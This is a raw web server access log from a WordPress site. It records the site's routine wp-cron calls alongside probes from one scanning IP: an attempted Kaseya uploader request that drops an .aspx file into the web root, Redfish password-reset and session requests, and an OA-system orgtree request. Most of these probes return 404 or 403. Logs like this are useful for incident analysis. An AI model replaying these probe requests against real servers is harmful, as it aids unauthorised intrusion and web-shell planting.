103.4.122.14 - - [13/Jan/2026:21:07:09 +0800] "POST /wp-cron.php?doing_wp_cron=1768309629.6660940647125244140625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:07:06 +0800] "POST /SystemTab/uploader.aspx?Filename=uHCpzmea.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=uHCpzmea.aspx HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:21:07:25 +0800] "POST /wp-cron.php?doing_wp_cron=1768309645.2237050533294677734375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:07:22 +0800] "PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.1 Mobile/15E148 Safari/604.1"
103.4.122.14 - - [13/Jan/2026:21:07:31 +0800] "POST /wp-cron.php?doing_wp_cron=1768309651.2216279506683349609375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:07:28 +0800] "POST /redfish/v1/SessionService/Sessions/ HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.168 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:21:08:13 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:21:08:39 +0800] "POST /index.php?mod=system&op=orgtree&do=orgtree HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:21:08:45 +0800] "POST /wp-cron.php?doing_wp_cron=1768309725.7651751041412353515625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:08:42 +0800] "GET /cms/ HTTP/1.1" 404 10863 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:21:08:55 +0800] "POST /wp-cron.php?doing_wp_cron=1768309735.4172680377960205078125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:08:52 +0800] "POST /index.php HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0"
103.4.122.14 - - [13/Jan/2026:21:09:26 +0800] "POST /wp-cron.php?doing_wp_cron=1768309766.7660479545593261718750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
